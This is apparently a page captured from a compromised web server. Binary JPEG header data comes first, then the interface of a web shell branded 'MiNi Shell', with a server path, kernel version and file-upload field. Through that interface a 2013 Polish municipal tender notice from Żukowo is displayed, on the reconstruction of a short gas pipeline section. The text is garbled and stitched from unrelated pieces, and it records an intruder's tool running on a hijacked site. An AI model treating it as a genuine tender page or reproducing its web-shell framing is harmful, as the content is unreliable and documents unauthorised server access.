JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131010/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131010/413346-N-2013.html

<p class="kh_header"><b>Żukowo: Przebudowa  odcinka  gazociągu  ś/c  DN  150  mm  na  terenie  działki  nr  39  w  Borkowie  (Etap  I) - długość ok. 33 m</b><br>
<b>Numer ogłoszenia: 413346 - 2013; data zamieszczenia: 10.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żukowo , ul. Gdańska 52, 83-330 Żukowo, woj. pomorskie, tel. +48 58 6858300, faks +48 58 6858300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  odcinka  gazociągu  ś/c  DN  150  mm  na  terenie  działki  nr  39  w  Borkowie  (Etap  I) - długość ok. 33 m.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa  odcinka  gazociągu  ś/c  DN  150  mm  na  terenie  działki  nr  39  w  Borkowie  (Etap  I) - długość ok. 33 m.
Zamówienie obejmuje:
1) budowę tymczasowego odcinka gazociągu z rur polietylenowych DN 63 mm na długości 
ok. 140 m,
2) przebudowę gazociągu ś/c DN 150 mm od punktu PzW do punktu PzZ - długość ok. 33 m, 
3) demontaż tymczasowego odcinka gazociągu.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.	Zamawiający może udzielić wykonawcy w okresie 3 lat od udzielenia zamówienia  podstawowego   zamówień uzupełniających, polegających na powtórzeniu tego samego rodzaju zamówienia, czyli budowie / przebudowie sieci gazowej na terenie Gminy Żukowo. 
2.	Łączna wartość zamówień uzupełniających nie może być wyższa niż 50% wartości zamówienia   podstawowego.
3. Wynagrodzenie za roboty budowlane  objęte zamówieniami uzupełniającymi będzie ustalane   w trakcie negocjacji z wykonawcą z uwzględnieniem składników cenotwórczych zaoferowanych w przetargu, a w przypadku ich braku o odpowiednie katalogi i cenniki oraz  kalkulację własną wykonawcy. Zamawiający dopuszcza stosowanie upustów do wyliczonych cen. 
4.	Podstawą do realizacji zamówienia uzupełniającego będzie odrębna umowa, która będzie  określała m.in. zakres zamówienia, termin realizacji, wysokość wynagrodzenia wykonawcy, terminy płatności, odbiory, warunki gwarancji i rękojmi, udział podwykonawców w realizacji zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.12.20-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie spełniony jeżeli wykonawca wykaże, iż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował co najmniej dwa zamówienia, z których każde polegało na budowie / przebudowie / rozbudowie sieci gazowej co najmniej ś/c, a wartość co najmniej jednego ze zrealizowanych zamówień wynosiła nie mniej niż 60.000,00 PLN netto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie spełniony, jeżeli wykonawca wykaże, iż dysponuje
a) 	kierownikiem budowy (1 osoba)  z uprawnieniami budowlanymi w zakresie sieci i instalacji gazowych bez ograniczeń, legitymującym się co najmniej 5-cio letnim doświadczeniem w kierowaniu robotami budowlanymi,
b) 	osobą posiadającą świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci gazowych (co najmniej w zakresie sieci gazowych przesyłowych o ciśnieniu nie wyższym niż  0,5 MPa) wydane przez uprawnione Komisje Kwalifikacyjne powoływane przez Prezesa Urzędu Regulacji Energetyki. 


Jeżeli kierownik budowy posiada świadectwo kwalifikacyjne w zakresie eksploatacji sieci gazowych w wymaganym przez zamawiającego zakresie - wykonawca nie musi dysponować drugą osobą z uprawnieniami w zakresie eksploatacji sieci gazowych. 

Uprawnienia budowlane, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994 r. prawo budowlane (tekst jednolity Dz. U. z  2010 r., Nr 243, poz. 1623 
z późn. zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., 
Nr 83, poz.  578 z późn. zm.). Dopuszcza się ważne i odpowiadające im uprawnienia nadane na podstawie wcześniej obowiązujących przepisów.

W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394 z późn. zm.).
Kierownik budowy musi być zrzeszony we właściwej branżowo izbie samorządu zawodowego zgodnie ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r., Nr 5,  poz. 42).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej, składa dokument lub dokumenty, wystawione w kraju, w którym ma
siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument lub dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się
dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed
notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub
gospodarczego kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 2. W przypadku
wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego: 1) oferta powinna zawierać
pełnomocnictwo ustanawiające pełnomocnika (lidera) do reprezentowania wykonawców w postępowaniu o
udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
publicznego, pełnomocnictwo należy złożyć w formie oryginału lub kopii poświadczonej przez notariusza, 2)
każdy z wykonawców zobowiązany jest do dostarczenia dokumentów potwierdzających, że nie podlega
wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy - prawo zamówień publicznych, 3) każdy z
wykonawców składa INFORMACJĘ NR 1 w zakresie przynależności do grupy kapitałowej lub braku
przynależności do grupy kapitałowej. 3. W przypadku spółki cywilnej do oferty należy dołączyć umowę spółki
cywilnej, jeżeli inaczej uregulowano zasady współpracy i reprezentacji przedsiębiorców w spółce. Jeżeli oferta
spółki cywilnej zostanie wybrana, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia
publicznego umowy spółki cywilnej. 4. Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w art.
22 ust. 1 ustawy polega na zasobach innych podmiotów to składa w formie pisemnej zobowiązanie podmiotu
trzeciego, które w sposób jednoznaczny i niebudzący wątpliwości określi: 1) kto jest podmiotem przyjmującym
zasoby, 2) nazwę, dane adresowe podmiotu trzeciego, 3) zakres zobowiązania podmiotu trzeciego (jakie zasoby
udostępnia), 4) przedmiot zobowiązania (czego dokładnie zobowiązanie dotyczy), 5) w jaki sposób zobowiązanie
będzie wykonane (sposób wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu
zamówienia), w jakim okresie czasu itp., 6) charakter stosunku, jaki będzie łączył wykonawcę z innym
podmiotem, 7) oświadczenie o solidarnej odpowiedzialności za zobowiązania wykonawcy wynikające ze
złożonej oferty w czasie realizacji zamówienia. W celu wykazania przez wykonawcę dysponowania zasobami
podmiotu trzeciego wykonawca może przedstawić jedną z umów nazwanych, regulowanych postanowieniami
Kodeksu Cywilnego jak i oświadczenia woli podmiotu trzeciego. Jeżeli przedmiotem udostępnienia będą wiedza i
doświadczenie to zobowiązanie powinno wprost wskazywać na jednoczesne uczestnictwo udostępniającego w
realizacji zamówienia i określeniu charakteru tego uczestnictwa. Zobowiązanie musi być podpisane przez osoby
upoważnione do składania oświadczeń woli w imieniu podmiotu trzeciego (podpisy czytelne, a w przypadku
kiedy podpisy są nieczytelne - opatrzone pieczątkami imiennymi). Wszystkie zobowiązania należy składać w
oryginale. 5. W celu wskazania, które części zamówienia będą realizowane przez podwykonawców wykonawca
winien złożyć WYKAZ CZĘŚCI ZAMÓWIENIA REALIZOWANYCH PRZEZ PODWYKONAWCÓW. Wykonawca,
który złoży na formularzu OFERTA oświadczenie, że będzie realizował zamówienie bez udziału podwykonawców
składa WYKAZ CZĘŚCI ZAMÓWIENIA REALIZOWANYCH PRZEZ PODWYKONAWCÓW z adnotacją >nie
dotyczy<. 6. Upoważnienie do podpisania oferty (pełnomocnictwo) winno być dołączone do oferty, o ile nie
wynika to z innych dokumentów załączonych do oferty. Pełnomocnictwo w swojej treści winno jednoznacznie
wskazywać uprawnienie do podpisania oferty. Pełnomocnictwo należy przedłożyć w formie oryginału lub kopii
poświadczonej przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie                            z zastrzeżeniem postanowień ust. 11. 
2. Niedopuszczalne są zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty,                     z wyjątkiem zmian o których mowa w ust. 3.
3. Zmiany w umowie mogą dotyczyć:
1) terminu wykonania zamówienia,
2) wysokości wynagrodzenia Wykonawcy,
3) udziału osób - kierownika budowy, kierowników robót,
4) udziału Podwykonawców przy realizacji zamówienia,
5) zmiany sposobu wykonania robót w stosunku do dokumentacji projektowej.
4.  Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
1) przerwy w realizacji zamówienia na skutek działań podmiotów trzecich, np. przedłużanie terminów wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, badań, ekspertyz, uzgodnień z przyczyn niezawinionych przez wykonawcę, 
2) 	konieczności uzyskania dodatkowych uzgodnień i decyzji administracyjnych,
3) przedłużanie odbiorów przez innych gestorów sieci i urządzeń z przyczyn niezawinionych przez Wykonawcę,
4) utrudnianie przez właścicieli nieruchomości dostępu do nieruchomości, 
5)	konieczności wykonania prac dodatkowych, które będą niezbędne dla  prawidłowej realizacji przedmiotu zamówienia, a których nie można było przewidzieć na etapie składania oferty,
6) rezygnacji z realizacji części zamówienia,
7) czasowego wstrzymania robót przez inspektora nadzoru inwestorskiego / Zamawiającego lub inne służby / organy do tego uprawnione.
8) zmiany materiałów / technologii wykonania elementów robót
9) działania siły wyższej (np. klęski żywiołowej, katastrofy budowlanej) mającej bezpośredni wpływ na terminowość wykonywania robót,
10) wystąpienia warunków atmosferycznych uniemożliwiających prowadzenie robót - fakt ten musi zostać potwierdzony przez inspektora nadzoru w dzienniku budowy i zostać zgłoszony Zamawiającemu,
11) wystąpienia wykopalisk uniemożliwiających prowadzenie robót,
12) wystąpienia istotnego błędu w dokumentacji projektowej wymagającego czasu  na jego usunięcie  przez wykonawcę dokumentacji projektowej.
5.  Zmiana wysokości wynagrodzenia Wykonawcy może nastąpić w przypadku:
1)  odstąpienia (rezygnacji) od części zamówienia,
2) wprowadzenia zmian w dokumentacji projektowej w postaci prac dodatkowych, robót zamiennych / równoważnych nie wykraczających poza zakres przedmiotu, ale niezbędnych do prawidłowej realizacji przedmiotu zamówienia (zwiększenie bezpieczeństwa realizacji robót budowlanych, usprawnienie procesu budowlanego, usunięcie wad ukrytych dokumentacji projektowej, uzyskanie lepszego efektu użytkowego przedmiotu zamówienia, uzyskanie uzgodnień i decyzji administracyjnych),
3) ustawowej zmiany stawki podatku VAT,
4) bezpośrednich płatności wynagrodzenia Podwykonawcom,
5) zmiany materiałów / technologii wykonania robót w stosunku do dokumentacji projektowej.
6. Zmiana udziału podwykonawców może nastąpić w przypadku:
1) skorzystania z podwykonawców w realizacji zamówienia mimo, iż w złożonej ofercie wykonawca nie przewidywał realizacji części zamówienia w podwykonawstwie, 
2) zmiany zakresu prac realizowanych w podwykonawstwie. 
7. Zmiana osób - kierownika budowy, kierowników robót może nastąpić w przypadku:
1)  zdarzeń losowych niezależnych od Wykonawcy,
2)  utraty uprawnień przez wskazane przez wykonawcę osoby,
3)  wykreślenia osób z  listy członków branżowej izby samorządu zawodowego.
8. W przypadku zmiany osób Wykonawca winien przedstawić Zamawiającemu nowe osoby o niegorszych kwalifikacjach i uprawnieniach w stosunku do osób, które zostały wskazane w ofercie Wykonawcy i spełniających wymagania opisane w specyfikacji istotnych warunków zamówienia.
9. Zmiana  materiałów / technologii wykonania robót w stosunku do dokumentacji projektowej 
a) nie może wykraczać poza przedmiot zamówienia, przyczyniać się do nieuzasadnionego zwiększenia parametrów inwestycji,
b) musi być korzystne dla Zamawiającego i / lub przyszłego użytkownika,
c) nastąpić na skutek zmian materiałowych / technologicznych spowodowanych  okolicznościami:
-  niedostępności  na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych,
-  	zaprzestaniem produkcji lub wycofaniem z rynku materiałów i /  lub urządzeń,
-  	pojawieniem się na rynku materiałów i / lub urządzeń nowszej generacji pozwalających na obniżenie kosztów eksploatacji wykonanego przedmiotu zamówienia,
-  pojawieniem się nowszej technologii wykonania zaprojektowanych robót pozwalającej na obniżenie kosztów eksploatacji wykonanego przedmiotu zamówienia,
- 	koniecznością zrealizowania zamówienia przy zastosowaniu innych materiałów / rozwiązań technicznych czy technologicznych niż wskazane w dokumentacji projektowej i /  lub specyfikacji technicznej wykonania i odbioru robót budowlanych,  gdyby zastosowanie przewidzianych materiałów / rozwiązań w dokumentacji projektowej groziło nie wykonaniem lub wadliwym wykonaniem przedmiotu zamówienia na dzień odbioru przedmiotu zamówienia, nie uzyskaniem pozwolenia na użytkowanie.  
10.Warunki dokonywania zmian:
1)  inicjowanie zmian na pisemny wniosek Wykonawcy lub Zamawiającego,
2) uzasadnienie konieczności i wpływu zmian na realizację zamówienia: wpisy do dziennika budowy, protokoły konieczności, kosztorysy robót zamiennych, zaniechanych, dodatkowych, odniesienie do postanowień SIWZ,
3) w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany,  a w przypadku podwykonawców należy podać zakres zamówienia realizowany w podwykonawstwie, wysokość wynagrodzenia podwykonawcy, termin realizacji robót budowlanych / dostaw / usług.
11.Zmiany zapisów umowy, które nie odnoszą się do treści oferty nie wymagają pisemnego aneksu pod rygorem nieważności. Za zmiany takie uważa się np.:
1) zmianę koordynatora za strony Zamawiającego,
2) zmianę osób nadzorujących roboty, czyli Inspektora Nadzoru,
3) zmianę rachunku bankowego, 
4) zmiany adresowe,
12.Strony zobowiązane są do powiadomienia na piśmie o zmianach o których mowa w ust. 11.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zukowo.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Żukowo,
ul.Gdańska 52, 83-330 Żukowo; Referat Zamówień Publicznych. Na wniosek wykonawcy zamawiający przekaże
mu specyfikację istotnych warunków zamówienia w wersji papierowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2013 godzina 12:00, miejsce: Urząd Gminy Żukowo, ul. Gdańska 52, 83-330 Żukowo; pok. nr 3 - Biuro Obsługi
Klienta..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com